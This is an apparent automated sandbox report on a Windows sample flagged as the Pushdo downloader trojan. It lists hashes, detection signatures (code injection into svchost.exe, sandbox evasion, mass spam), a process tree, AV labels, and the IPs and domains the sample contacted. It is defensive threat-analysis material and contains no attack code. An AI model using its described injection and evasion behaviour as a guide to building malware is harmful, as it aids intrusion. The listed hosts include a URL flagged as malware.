Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iJzpyjAehB.exe

Overview

General Information

Sample Name:iJzpyjAehB.exe
Original Sample Name:3e7a4148f1133cb4b8a097fd74590f44.exe
Analysis ID:823805
MD5:3e7a4148f1133cb4b8a097fd74590f44
SHA1:fec43c982b497f4ddbb8c35245c295355676a07a
SHA256:6618359d4d19997728359453b0598be7562c293ef9d6ac51f2635586096a52bd
Tags:exe
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Connects to many different domains
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Connects to several IPs in different countries
Uses SMTP (mail sending)
PE file contains more sections than normal
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • iJzpyjAehB.exe (PID: 5856 cmdline: C:\Users\user\Desktop\iJzpyjAehB.exe MD5: 3E7A4148F1133CB4B8A097FD74590F44)
    • svchost.exe (PID: 5300 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5356 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5392 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 260 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 1100 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6056 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 3E7A4148F1133CB4B8A097FD74590F44)
    • svchost.exe (PID: 5832 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6284 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6568 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 7112 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 9512 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 1420 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 3E7A4148F1133CB4B8A097FD74590F44)
    • svchost.exe (PID: 5204 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 3380 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5080 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6268 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6420 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.608690490.0000000010004000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000006.00000002.607161240.0000000010004000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000002.00000002.567367147.00000000007E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        00000000.00000002.607986528.0000000010004000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          00000006.00000002.567130920.0000000002260000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            2.2.pigalicapi.exe.4000000.9.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              2.2.pigalicapi.exe.10004088.11.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                0.2.iJzpyjAehB.exe.10004088.12.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  6.2.pigalicapi.exe.2260000.3.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                    6.2.pigalicapi.exe.2261e88.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                      Click to see the 19 entries
                      No Sigma rule has matched
                      Timestamp:173.231.184.124192.168.2.680502662037771 03/10/23-07:55:52.473955
                      SID:2037771
                      Source Port:80
                      Destination Port:50266
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.6104.21.23.949714802016867 03/10/23-07:54:15.104296
                      SID:2016867
                      Source Port:49714
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:63.251.106.25192.168.2.680503162037771 03/10/23-07:55:54.158079
                      SID:2037771
                      Source Port:80
                      Destination Port:50316
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: iJzpyjAehB.exeReversingLabs: Detection: 52%
                      Source: iJzpyjAehB.exeVirustotal: Detection: 23%Perma Link
                      Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                      Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 52%
                      Source: 10.2.svchost.exe.4004000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.3.iJzpyjAehB.exe.23b0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.iJzpyjAehB.exe.10004088.12.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.2.pigalicapi.exe.2390000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 10.3.svchost.exe.54a0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.4000000.9.unpackAvira: Label: TR/Spy.Gen
                      Source: 2.3.pigalicapi.exe.23e0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 12.2.svchost.exe.4004000.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.3.svchost.exe.3be0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.2.pigalicapi.exe.2260000.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.pigalicapi.exe.7ee118.2.unpackAvira: Label: TR/Downloader.Gen
                      Source: 11.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 19.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.10004088.11.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.2.svchost.exe.4004000.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.3.svchost.exe.54a0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.2.svchost.exe.4036a00.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.iJzpyjAehB.exe.10010318.11.unpackAvira: Label: TR/Downloader.Gen
                      Source: 12.2.svchost.exe.4036a00.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 6.2.pigalicapi.exe.10010318.10.unpackAvira: Label: TR/Downloader.Gen
                      Source: 11.3.svchost.exe.2df0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 23.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 12.3.svchost.exe.3be0000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 11.3.svchost.exe.2df0000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.7e0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.3.pigalicapi.exe.23c0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.3.svchost.exe.5720000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 12.2.svchost.exe.4050e00.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.pigalicapi.exe.10010318.12.unpackAvira: Label: TR/Downloader.Gen
                      Source: 11.2.svchost.exe.4050e00.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.iJzpyjAehB.exe.23b0000.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 0.2.iJzpyjAehB.exe.238e118.5.unpackAvira: Label: TR/Downloader.Gen
                      Source: 24.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.2.pigalicapi.exe.226e118.2.unpackAvira: Label: TR/Downloader.Gen
                      Source: 14.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 12.3.svchost.exe.54a0000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.3.svchost.exe.2de0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 18.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 11.2.svchost.exe.4036a00.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.iJzpyjAehB.exe.4000000.9.unpackAvira: Label: TR/Spy.Gen
                      Source: 6.3.pigalicapi.exe.2390000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 19.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 16.2.svchost.exe.7e520000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 14.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 10.2.svchost.exe.406b200.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 24.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 21.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 6.2.pigalicapi.exe.400e290.8.unpackAvira: Label: TR/Downloader.Gen
                      Source: 6.2.pigalicapi.exe.2261e88.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.3.pigalicapi.exe.2280000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.2.svchost.exe.7edb0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 25.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 12.3.svchost.exe.27f0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 21.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.23e0000.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 18.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 22.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 10.2.svchost.exe.4050e00.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 11.3.svchost.exe.54a0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.iJzpyjAehB.exe.2381e88.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 13.2.svchost.exe.7e670000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 2.2.pigalicapi.exe.7e1e88.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.3.svchost.exe.2df0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 23.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 12.2.svchost.exe.406b200.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.3.svchost.exe.55e0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 25.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.2.pigalicapi.exe.10004088.9.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.pigalicapi.exe.400e290.10.unpackAvira: Label: TR/Downloader.Gen
                      Source: 10.3.svchost.exe.54a0000.2.unpackAvira: Label: TR/Proxy.Gen
                      Source: 0.2.iJzpyjAehB.exe.400e290.10.unpackAvira: Label: TR/Downloader.Gen
                      Source: 0.3.iJzpyjAehB.exe.23b0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 13.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 12.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 10.3.svchost.exe.3550000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 12.3.svchost.exe.3be0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 16.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 11.2.svchost.exe.406b200.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 6.2.pigalicapi.exe.4000000.7.unpackAvira: Label: TR/Spy.Gen
                      Source: 0.2.iJzpyjAehB.exe.2380000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04004BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,0_2_04004BA0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_04008BB0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_040047F0
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_04004880
                      Source: C:\Users\user\Desktop\iJzpyjAehB.exeCode function: 0_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_04008CF0
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,2_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04004BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,2_2_04004BA0
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,2_2_04008BB0
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,2_2_040047F0
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,2_2_04004880
                      Source: C:\Users\user\pigalicapi.exeCode function: 2_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,2_2_04008CF0
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,6_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04004BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,6_2_04004BA0
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,6_2_04008BB0
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,6_2_040047F0
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,6_2_04004880
                      Source: C:\Users\user\pigalicapi.exeCode function: 6_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_04008CF0
                      Source: iJzpyjAehB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:52661 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:53163 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:53173 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:53170 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:50304 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:50309 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50310 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:50328 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:50353 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50343 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50237 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:50341 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50342 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:50436 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50523 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:50525 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:50527 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50524 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50893 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:52593 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52635 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:52650 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:52648 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:52950 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:52125 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:53132 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:53263 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:52653 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:53355 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:53389 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53348 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53332 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:53391 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:53917 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:53642 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54274 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:53695 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:54014 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:54830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.6:54841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:54938 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.6:55016 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:55461 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:55685 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.6:56976 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:58790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:2059 version: TLS 1.2

                      Networking

                      barindex
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.165 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 25
